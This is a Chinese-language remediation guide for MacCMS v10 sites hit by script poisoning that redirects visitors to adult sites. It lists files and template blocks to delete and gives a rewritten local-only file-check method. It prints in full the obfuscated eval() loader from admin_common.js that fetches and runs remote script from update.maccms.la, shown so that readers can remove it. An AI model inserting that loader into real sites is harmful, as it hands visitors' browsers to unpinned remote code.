

新版本存在恶意随机添加 js 文件投毒的问题，目前会导致晚上偷偷跳转到成人网站；如果实在难以解决，还是换个程序吧……
1.删除,application/admin/controller/Update.php 更新:

一定要删除这个文件!
2. 修改同目录下 Safety.php 的 file() 方法：
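/**
 * "File check" action of the admin safety page.
 *
 * Without the `ck` request parameter the action only renders the
 * `admin@safety/file` view. With `ck` present it walks the installation
 * directory through $this->listDir('./'), prints one line per file via
 * mac_echo() (readability, size, permission bits and an MD5 prefix taken
 * from the listDir() result) and then exits. The earlier download of a
 * remote file manifest was removed on purpose; the check uses local data
 * only, so no request leaves the server.
 *
 * @return mixed the rendered view, or the response of $this->error() when
 *               listDir() did not populate $this->_files
 */
public function file()
{
    $param = input();

    // empty() instead of a bare index read: a request without `ck`
    // previously triggered an "undefined index" notice. The unused `ft`
    // parameter is no longer read at all.
    if (empty($param['ck'])) {
        return $this->fetch('admin@safety/file');
    }

    mac_echo('<style type="text/css">body{font-size:12px;color: #333333;line-height:21px;}span{font-weight:bold;color:#FF0000}</span></style>');

    // The remote manifest lookup that used to live here is intentionally
    // gone; only the local directory walk below is used.
    $this->listDir('./');
    if (!is_array($this->_files)) {
        return $this->error(lang('admin/safety/file_msg2'));
    }

    $total_files = count($this->_files);
    foreach ($this->_files as $path => $info) {
        // Drop only a leading "./". ltrim($path, './') stripped every leading
        // dot and slash, so "./.htaccess" was displayed as "htaccess".
        $file_path = substr($path, 0, 2) === './' ? substr($path, 2) : $path;

        // filesize()/fileperms() return false when the stat fails; use
        // neutral display values instead of passing false to number_format().
        $size = filesize($path);
        $file_size = $size === false ? 0 : $size;
        $perms = fileperms($path);
        $file_perms = $perms === false ? 'n/a' : substr(sprintf('%o', $perms), -4);
        $file_md5 = isset($info['md5']) ? (string) $info['md5'] : '';

        // Readability of the file.
        if (is_readable($path)) {
            $status = '正常';
            $color = 'green';
        } else {
            $status = '不可读';
            $color = 'red';
        }

        // Plausibility of the size: non-empty and below 100 MB. The label
        // used to be computed but never printed; it is now shown next to
        // the byte count.
        if ($file_size > 0 && $file_size < 100000000) {
            $size_status = '正常';
            $size_color = 'green';
        } else {
            $size_status = '异常';
            $size_color = 'orange';
        }

        // File names come from the filesystem, not from a template the
        // project controls: escape them before writing into the admin page.
        $safe_path = htmlspecialchars($file_path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

        mac_echo($safe_path . '---' .
            "<font color='$color'>$status</font> | " .
            "<font color='$size_color'>大小: " . number_format($file_size) . " 字节 ($size_status)</font> | " .
            "权限: $file_perms | MD5: " . substr($file_md5, 0, 8) . "...");
    }

    mac_echo("<br><strong>总计检查文件: $total_files 个</strong>");
    exit;
}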
3.application/admin/view/index/welcome.html
删除
<!-- Welcome-page block shown only when $update_sql is set: a "database
     update" notice whose link goes to url('update/step2'), i.e. into the
     Update controller (application/admin/controller/Update.php). The
     surrounding note recommends removing this block together with that
     controller. -->
{if condition="$update_sql"}
<table class="tbinfo pleft layui-table" ><thead><th colspan="2">{:lang('admin/index/welcome/tip_update_db')}</th></thead><tr><td colspan="2"><font class="tif s20">{:lang('admin/index/welcome/tip_update_db_txt')}</font><a class="j-iframe" title="{:lang('admin/index/welcome/tip_update_go')}" data-href="{:url('update/step2')}"><font class="tit s20">{:lang('admin/index/welcome/tip_update_go')}</font></a> </td></tr></table>
{/if}
4./static/js/admin_common.js
删除
// Block from static/js/admin_common.js that the note above says to delete.
// Unpacking the eval()'d payload by hand (its dictionary is
// scr|ipt|check|body|src|update|maccms|la|v10|append|...) shows it appending
// a <script> element to <body> whose src is //update.maccms.la/v10/?c=check
// with MAC_VERSION, PHP_VERSION, THINK_VERSION and a Math.random() value as
// query parameters. In other words: remote, unpinned code is fetched and run
// on every page that includes this file. That matches the remote-script
// poisoning described above; removing the block removes the load.
$(function(){
// Guard only fires where the three version globals are defined —
// presumably the admin UI pages; verify against the templates that set them.
if( typeof(MAC_VERSION) !='undefined' && typeof(PHP_VERSION) !='undefined' && typeof(THINK_VERSION) !='undefined' ) {
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(\'3\').9(\'<0\'+\'1 4="\'+\'//5.6.7/8/?c=2&a=\'+b+\'&d=\'+e+\'&f=\'+g+\'&h=\'+i.j()+\'"></0\'+\'1>\');',20,20,'scr|ipt|check|body|src|update|maccms|la|v10|append|v|MAC_VERSION||p|PHP_VERSION|tp|THINK_VERSION|t|Math|random'.split('|'),0,{}));
}
});
